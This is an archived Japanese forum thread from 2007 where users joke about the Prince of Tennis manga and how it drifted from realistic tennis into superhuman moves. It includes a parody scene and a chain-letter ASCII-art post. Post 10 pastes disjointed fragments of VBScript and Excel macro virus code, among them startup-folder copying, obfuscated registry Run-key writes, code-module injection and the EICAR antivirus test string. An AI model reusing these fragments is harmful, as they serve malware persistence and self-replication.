5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

テニスの王子様が初期の路線で今まで続いていたら?

1 :名無しさんの次レスにご期待下さい:2007/01/21(日) 02:46:58 ID:7MLpVt8R
テニヌがテニスのままでいたなら
どんな感じになってたと思う?

2 :名無しさんの次レスにご期待下さい:2007/01/21(日) 02:52:13 ID:oP2rCbjR
銀の波動球は48式まで

3 :名無しさんの次レスにご期待下さい:2007/01/21(日) 04:04:54 ID:eV9qXOpa
無理。スポーツ漫画でやるとやばいのは固有名詞のある必殺技。これをやると結局必殺技の破り合いに
なりインフレが加速する。腐女子向けやらはともかく、最初から全員ありえない技もってたし、こうなるのは必然。


4 :名無しさんの次レスにご期待下さい:2007/01/21(日) 04:12:55 ID:14yiHB39
>1はどこからテニヌになったと思っているのか参考までに伺いたいのだが。

5 :名無しさんの次レスにご期待下さい:2007/01/21(日) 04:36:25 ID:LWQRI19R
ツイストサーブはあの曲がり方は無いけど実際にあるし
部長のドロップも最初は跳ねていたw
バギーホイップも(ry
乾のデータテニスも「理屈じゃない」でまだマシw
ダンクアクロバティックムーンバーニングも同様
すべての問題はツバメ返しからだなw
まあそのまえの越前のライン際にボールを止めて
「これなら入ってるでしょ」って言うのも無いけどね
長文になったが初期はかろうじてテニス漫画として成り立っていたw
後半から許斐はテニスをなめているwww

6 :名無しさんの次レスにご期待下さい:2007/01/21(日) 04:37:28 ID:LWQRI19R
>>5>>1

7 :名無しさんの次レスにご期待下さい:2007/01/21(日) 04:44:52 ID:2wMS3ba5
初期は大げさな描写ってだけだったからな。
今じゃ超人描写。

8 :名無しさんの次レスにご期待下さい:2007/01/21(日) 07:08:36 ID:PZGJjXsu
テニヌ化はヒグマ落としからだろ

9 :名無しさんの次レスにご期待下さい:2007/01/21(日) 15:53:37 ID:eijKObdI
つばめ返しよぉ
なんでカットしてるのにトップスピンになって
ボールがはねないんだ?意味不明なんだが
あのモーションなら逆に白鯨みたく浮くだろ?

10 :名無しさんの次レスにご期待下さい:2007/01/21(日) 16:44:46 ID:ea8UF81V
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


11 :名無しさんの次レスにご期待下さい:2007/01/23(火) 16:45:56 ID:pVMAA552
ダッシュ波動球をうつ河村
銀「なに!」
2式波動球を繰り出すも銀のラケットを弾かれた
タカ「はぁはぁ・・・」
銀「ほう、満更ではないようだな」
タカ「3式波動球をだせ銀」
銀「知っていたのか」
タカ「鉄が口を滑らせてな」
銀「よかろう、見せてやる ふんっ!」
タカ「ここだダッシュ波動球!」
河村は吹っ飛んでしまう
タカ「ぬわーーーっ!! こ、ここまでとは・・・」
銀「お前に絶望的な話をしてやろう。後2つ、俺はさらに強力な波動球を持っている」
タカ「なっ・・・!」


こうなってた

12 :名無しさんの次レスにご期待下さい:2007/01/23(火) 17:33:56 ID:rgT3Ofrl
初期って特に長所も無い腐女子狙いの糞漫画じゃん。
テニスもやった事ない奴には面白かったかも知れんが経験者が見ても腹立つだけ。
最近のは斜め上に吹っ切れてて面白い。

13 :名無しさんの次レスにご期待下さい:2007/01/24(水) 23:37:48 ID:6JJGrHTH
冷静にギャグ漫画としてみて自分で突っ込んでみ。ツッコミどころがありすぎて面白いから。

14 :名無しさんの次レスにご期待下さい:2007/01/25(木) 23:49:53 ID:FKd4X6T+
女テニ描きたかったんじゃなかった?

15 :名無しさんの次レスにご期待下さい:2007/01/29(月) 03:44:19 ID:w6M7w4Qd
>>1
今週みたいにダブルスなのにシングルスしたりすることって実際あるんですか?

16 :名無しさんの次レスにご期待下さい:2007/01/29(月) 14:57:24 ID:EfM+FNaV
ねーよ

17 :名無しさんの次レスにご期待下さい:2007/02/05(月) 03:08:23 ID:0uJfXwJI0
普通のテニスとして成立してたのは不動峰までだろ

18 :名無しさんの次レスにご期待下さい:2007/02/05(月) 16:40:17 ID:/nVUv1t90
ルドルフの時のはちまきのドロップボレーが最強

19 :名無しさんの次レスにご期待下さい:2007/02/08(木) 15:23:01 ID:mjLy2roE0
【おちょなんさん】
このすれは ぼくとあなたと それからおちょなんさんがいます。
おちょなんさんは みんながいるとき あなたのいえにかくれています。
あなただけのとき いえのなかを ぐるぐるまわります。
おちょなんさんのかおは こんなです。
          从川川川川川川川川川川川|
           从川川川川川川川川川川川川
         从川川川川川川川川川川川川川
       从川川川川川川川川川川川川川川
      从川川川川川川リ      .:::   ヾ川川
     从川川川川ルリ  :::...   .::       ヾ川
   从川川川川リ′    ::::. .::: ∧       :|
   从川川川lリ:.     A :::. ::. |__|     |
    从川川川: .     |lll| ::  :: |lll|     .:|
     从川川l||: : : .    ∀..::::  :::.∀    .:.:|
    从川川川: : : :  :::::::::: r'_ _ヽ:::     . : .:|
    从川川川:. : .                   . :|
    从川川川、:. .         /ハヽ       :|
    ヾ|川l川l从:.:.       |:|::|::|        :/!
      ヾ|川川从:.:.      ヽv:/       .:厶|
       ハ,r‐一ヽ:.:.:.:. .       .:  .:./三|
.        /:|ニ三三≧x、:丶.___ノ  .:/::三:!
       /::/三三三三ニミ、:.      :/三三|
.      /::/三三三三三三ミ、:. . . . . :/::三三:|


このれすをみたあなたのいえに おちょなんさんがむかいます。
ただし ほかのすれにみっつこのれすをはりつけたら おちょなんさんはさっていきます。
ぼくはこれでたすかりました。
でもいいです。

7 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)